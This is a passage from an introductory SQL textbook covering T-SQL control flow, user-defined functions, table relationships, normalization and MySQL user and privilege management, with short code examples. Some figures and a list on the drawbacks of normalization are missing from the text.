ELSE statement facilitates this. To test for a true or false condition you can
use >, <, = and NOT along with testing variables. The syntax for the IF
ELSE statement is the following; note there is only one statement allowed
between each IF ELSE:
IF X=Y
Statement when True
ELSE
Statement when False
BEGIN END
If you need to execute more than one statement in the IF or ELSE block, then
you can use the BEGIN END statement. You can put together a series of
statements which will run one after another regardless of what was tested
before them. The syntax for BEGIN END is the following:
IF X=Y
BEGIN
statement1
statement2
END
WHILE BREAK
When you need to loop around a piece of code X number of times you can
use the WHILE BREAK statement. It will keep looping until either the
Boolean test condition becomes false or the code hits the BREAK
statement. The WHILE statement will continue to execute as long as the
Boolean expression returns true. Once it is false, the loop ends and the
next statement is executed. You can also use the optional CONTINUE
statement, which moves processing right back to the WHILE statement. The
syntax for the WHILE BREAK command is the following:
WHILE booleanExpression
    SQL_statement1 | statementBlock1
    BREAK
    SQL_statement2 | statementBlock2
    CONTINUE
    SQL_statement3 | statementBlock3
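A concrete sketch in T-SQL (the variable name is arbitrary): this loop prints the numbers 1 through 5 but skips 3, showing BREAK and CONTINUE together.
DECLARE @i INT = 0;
WHILE @i < 10
BEGIN
    SET @i = @i + 1;
    IF @i = 3 CONTINUE;  -- skip 3, jump back to the WHILE test
    IF @i > 5 BREAK;     -- stop the loop entirely after 5
    PRINT @i;
END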
CASE
There are two forms of CASE. You can use the simple form of CASE to
compare one value or scalar expression to a list of possible values and return
a value for the first match, or you can use the searched CASE form when
you need more flexibility to specify a predicate or mini function as opposed
to an equality comparison. The following code illustrates the simple form:
SELECT column1
CASE expression
WHEN valueMatched THEN
statements to be executed
WHEN valueMatched THEN
statements to be executed
ELSE
statements to catch all other possibilities
END
The following code illustrates the more complex form; it is useful for
computing a value depending on a condition:
SELECT column1
CASE
WHEN valueX_is_matched THEN
resulting_expression1
WHEN valueY_is_matched THEN
resulting_expression2
WHEN valueZ_is_matched THEN
resulting_expression3
ELSE
statements to catch all other possibilities
END
The CASE statement works like so: each table row is put through the CASE
statement and, instead of the column value, the value from the computation
is returned.
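Using the StudentInformation table from earlier, a simple-form CASE could translate the Year column into a label (the labels themselves are invented for illustration):
SELECT StudentNo,
CASE Year
    WHEN '1st' THEN 'Freshman'
    WHEN '2nd' THEN 'Sophomore'
    ELSE 'Upperclassman'
END AS Standing
FROM StudentInformation;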
Functions
As mentioned, functions are similar to stored procedures, but they differ in
that functions (or user-defined functions, UDFs) can execute within another
piece of work – you can use them anywhere you would use a table or
column. They are like methods, small and quick to run. You simply pass in
some information and a result is returned. There are two types of functions,
scalar and table-valued. The difference between the two is what you can
return from the function.
Scalar Functions
A scalar function can only return a single value of the type defined in the
RETURN clause. You can use scalar functions anywhere the scalar matches
the data type being used in the T-SQL statement. When calling them, you
can omit a number of the function’s parameters. You need to include a
RETURN statement if you want the function to complete and return control
to the calling code. The syntax for a scalar function is the following:
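A typical T-SQL scalar function, sketched with placeholder names and an assumed 20% tax rate:
CREATE FUNCTION dbo.AddTax (@price MONEY)
RETURNS MONEY
AS
BEGIN
    -- single scalar value returned, matching the RETURNS clause
    RETURN @price * 1.2;
END
You could then use it inside any query, for example: SELECT dbo.AddTax(SALARY) FROM EMPLOYEES;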
Table-Valued Functions
A table-valued function (TVF) lets you return a table of data rather than the
single value in a scalar function. You can use the table-valued function
anywhere you would normally use a table, usually from the FROM clause in
a query. With table-valued functions it is possible to create a reusable code
framework in a database. The syntax of a TVF is the following:
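A minimal inline table-valued function, sketched against the ENGINEERING_STUDENTS table used earlier (the function name and parameter are invented):
CREATE FUNCTION dbo.GetBigDepartments (@minStrength INT)
RETURNS TABLE
AS
RETURN
(
    SELECT ENGG_ID, ENGG_NAME
    FROM ENGINEERING_STUDENTS
    WHERE STUDENT_STRENGTH >= @minStrength
);
You would then use it like a table: SELECT * FROM dbo.GetBigDepartments(100);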
Notes on Functions
A function cannot alter any external resource, such as a table. A function
needs to be robust; if an error is generated inside it, either from invalid data
being passed in or from its logic, it will stop executing and control will
return to the T-SQL which called it.
Chapter 14 Relationships
A database relationship is a means of connecting two tables together based on
a logical link (i.e. they contain related data). Relationships facilitate database
queries to be executed on two or more tables and they also ensure data
integrity.
Types of relationships
There exist three major types in a database:
One-to-One
One-to-Many
Many-to-Many
One-to-One
This type of relationship is pretty rare in databases. A row in a given table X
will have at most one matching row in another table Y. Equally, a row in
table Y can only have one matching row in table X. An example of a
one-to-one relationship is one person having one passport.
One-to-Many
This is probably the most prevalent relationship found in databases. A row in
a given table X can have several matching rows in another table Y; however,
a row in table Y will only have a single matching row in table X. An
example is houses in a street: one street has multiple houses, and a house
belongs to one street.
Many-to-Many
A row in a given table X can possess several matching rows in another table
Y, and vice versa. This type of relationship is quite frequent where there are
zero, one or even many records in the master table related to zero, one or
many records in the child table. An example of this relationship is a school
where teachers teach students: a teacher can teach many students, and each
student can be taught by many teachers.
Referential Integrity
When two tables are connected in a database and share the same information,
it is necessary that the data in both tables is kept consistent, i.e. either the
information in both tables changes or neither table changes. This is known as
referential integrity. It is not possible to have referential integrity with tables
that are in separate databases.
When enforcing referential integrity, it isn’t possible to enter a record in the
child (address) table which references a record that doesn’t exist in the linked
parent (customer) table (i.e. the one with the primary key). You need to first
create the customer record and then use its details to create the address record.
You can also use triggers and stored procedures to enforce referential
integrity, in addition to using relationships.
Chapter 15 Database Normalization
In this chapter you will gain an in-depth knowledge of normalization
techniques and their importance in enhancing database conceptualization and
design. As a result, more efficient databases are created that give the SQL
software application an edge in performing effective queries and maintaining
data integrity at all times.
Definition and Importance of Database Normalization
Basically, normalization is the process of designing a database model to
reduce data redundancy by breaking large tables into smaller, more
manageable ones in which the same types of data are grouped together. Why
is database normalization important? Normalizing a database ensures that
the pieces of information stored are well organized, easily managed and
always accurate, with no unnecessary duplication. Merging the data from
the CUSTOMER_TBL table with the ORDER_TBL table will result in a large
table that is not normalized:
If you look closely at this table, there is data redundancy for the
customer named Kathy Ale. Always remember to minimize data redundancy,
both to save disk space and to prevent users from being confused by the
amount of information the table contains. There is also the possibility
that, among several tables containing such customer information, one table
may not match another, so how will a user verify which one is correct?
Also, if a certain piece of customer information needs to be updated, you
are required to update it in every database table where it appears. This
wastes time and effort in managing the entire database system.
Forms of Normalization
Normal form is the way of measuring the level to which a database has been
normalized and there are three common normal forms:
First Normal Form (1NF)
The first normal form or 1NF aims to divide a given set of data into logical
units or tables of related information. Each table will have an assigned
primary key, which is a specified column that uniquely identifies the table
rows. Every cell should have a single value and each row of a certain table
refers to a unique record of information. The columns that refer to the
attributes of the table information are given unique names and consist of the
same type of data values. Moreover, the columns and the rows are arranged
in no particular order.
Let us add a new table named Employee_TBL to the database that contains
basic information about the company’s employees:
Based on the diagram above, the entire company database was divided into
two tables – Employee_TBL and Customer_TBL. EmployeeID and
CustomerID are the primary keys set for these tables respectively. By doing
this, database information is easier to read and manage as compared to just
having one big table consisting of so many columns and rows. The data
values stored in Employee_TBL table only refer to the pieces of information
describing the company’s employees while those that pertain exclusively to
the company’s customers are contained in the Customer_TBL table.
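The 1NF split described above can be sketched as follows, again using Python's sqlite3. The column names are illustrative guesses, since the book's figures are not reproduced here.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Two tables, each with its own primary key and atomic (single-valued)
# columns: the 1NF structure described in the text.
conn.execute("""CREATE TABLE Employee_TBL (
    EmployeeID INTEGER PRIMARY KEY,
    LastName TEXT, FirstName TEXT, Address TEXT, ContactNumber TEXT)""")
conn.execute("""CREATE TABLE Customer_TBL (
    CustomerID INTEGER PRIMARY KEY,
    LastName TEXT, FirstName TEXT, Address TEXT)""")

# The primary key makes every row a unique record: a duplicate
# EmployeeID is rejected by the database itself.
conn.execute(
    "INSERT INTO Employee_TBL VALUES (1, 'Ale', 'Kathy', '1 Elm St', '555-0100')")
try:
    conn.execute(
        "INSERT INTO Employee_TBL VALUES (1, 'Doe', 'John', '2 Oak St', '555-0101')")
    unique_enforced = False
except sqlite3.IntegrityError:
    unique_enforced = True
print(unique_enforced)  # True
```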
Second Normal Form (2NF)
The second normal form or 2NF is the next step after you are successfully
done with the first normal form. This process now focuses on the functional
dependency of the database, which describes the relationships existing
between attributes. When there is an attribute that determines the value of
another, then a functional dependency exists between them. Thus, you will
store data values from the Employee_TBL and Customer_TBL tables,
which are partly dependent on the assigned primary keys, into separate tables.
In the figure above, the attributes that are partly dependent on the
EmployeeID primary key have been removed from Employee_TBL, and are
now stored in a new table called Employee_Salary_TBL. The attributes that
were kept in the original table are completely dependent on the table’s
primary key, which means that for every record of last name, first name,
address and contact number there is a corresponding unique employee ID.
In the Employee_Salary_TBL table, by contrast, a particular employee ID
does not point to a unique employee position or salary rate. More than one
employee could hold the same position (EmpPosition) and receive the same
pay rate (Payrate) or bonus (Bonus).
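The 2NF step can be sketched like this: the position and pay attributes, which are not uniquely determined by EmployeeID, move into a separate Employee_Salary_TBL. All data values here are invented for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Employee_TBL (
    EmployeeID INTEGER PRIMARY KEY,
    LastName TEXT, FirstName TEXT, Address TEXT, ContactNumber TEXT);
CREATE TABLE Employee_Salary_TBL (
    EmployeeID INTEGER REFERENCES Employee_TBL(EmployeeID),
    EmpPosition TEXT, Payrate REAL, Bonus REAL);
INSERT INTO Employee_TBL VALUES
    (1, 'Ale', 'Kathy', '1 Elm St', '555-0100'),
    (2, 'Doe', 'John',  '2 Oak St', '555-0101');
-- Two employees can share a position and pay rate, which is why these
-- columns do not belong in a table keyed only by EmployeeID.
INSERT INTO Employee_Salary_TBL VALUES
    (1, 'Clerk', 15.0, 500.0),
    (2, 'Clerk', 15.0, 500.0);
""")
shared = conn.execute(
    "SELECT COUNT(*) FROM Employee_Salary_TBL WHERE EmpPosition = 'Clerk'"
).fetchone()[0]
print(shared)  # 2
```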
Third Normal Form (3NF)
In the third normal form or 3NF, pieces of information that do not depend
on the primary key at all should also be moved out of the table. Looking
back at the Customer_TBL, two attributes are totally
independent of the CustomerID primary key - JobPosition (job position)
and JobDescription (job position description). Regardless of who the
customer is, any job position will have the same duties and responsibilities.
Thus, the two attributes will be separated into another table called
Position_TBL.
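A sketch of the 3NF step, assuming Customer_TBL keeps a PositionID column that references the new Position_TBL (the linking column is my assumption; the book only names the two tables):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Position_TBL (
    PositionID INTEGER PRIMARY KEY,
    JobPosition TEXT, JobDescription TEXT);
CREATE TABLE Customer_TBL (
    CustomerID INTEGER PRIMARY KEY,
    LastName TEXT,
    PositionID INTEGER REFERENCES Position_TBL(PositionID));
-- The description is stored once, however many customers hold the position.
INSERT INTO Position_TBL VALUES (1, 'Manager', 'Oversees daily operations');
INSERT INTO Customer_TBL VALUES (1, 'Ale', 1), (2, 'Doe', 1);
""")
# A join recovers the full picture for any one customer.
row = conn.execute("""
    SELECT c.LastName, p.JobDescription
    FROM Customer_TBL c
    JOIN Position_TBL p ON c.PositionID = p.PositionID
    WHERE c.CustomerID = 1""").fetchone()
print(row)  # ('Ale', 'Oversees daily operations')
```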
Drawbacks of Normalization
Though database normalization offers a number of advantages in organizing,
simplifying and maintaining the integrity of databases, you still need to
consider the following disadvantages:
EXAMPLE
More often than not, the CREATE USER statement will be used to first
create a new user account and then the GRANT statement is used to assign
the user privileges.
For instance, a new super user account can be created by executing the
CREATE USER statement given below:
CREATE USER super@localhost IDENTIFIED BY 'dolphin';
In order to check the privileges granted to the super@localhost user, the
query below with SHOW GRANTS statement can be used.
SHOW GRANTS FOR super@localhost;
+-------------------------------------------+
| Grants for super@localhost |
+-------------------------------------------+
| GRANT USAGE ON *.* TO `super`@`localhost` |
+-------------------------------------------+
1 row in set (0.00 sec)
Now, if you wanted to assign all privileges to the super@localhost user, the
query below with GRANT ALL statement can be used.
GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION;
The ON *.* clause refers to all databases and all objects within those
databases. The WITH GRANT OPTION clause enables super@localhost to assign
privileges to other user accounts.
If the SHOW GRANTS statement is used again at this point, it can be seen
that the privileges of the super@localhost user have been modified, as
shown in the syntax and the result set below:
SHOW GRANTS FOR super@localhost;
+----------------------------------------------------------------------+
| Grants for super@localhost |
+----------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT
OPTION |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
Now, assume that you want to create a new user account with all privileges
on the classicmodels sample database. You can accomplish this by using the
query below:
CREATE USER auditor@localhost IDENTIFIED BY 'whale';
GRANT ALL ON classicmodels.* TO auditor@localhost;
Using only one GRANT statement, various privileges can be granted to a
user account. For instance, to generate a user account with the privilege
of executing SELECT, INSERT and UPDATE statements against the
database classicmodels, the query below can be used.
CREATE USER rfc IDENTIFIED BY 'shark';
GRANT SELECT, INSERT, UPDATE ON classicmodels.* TO rfc;
I want to wish you the very best of luck in learning SQL. I hope that it
serves you well in your working life, and that it tempts you to move on
and learn more about the computer programming languages that every
organization loves to use.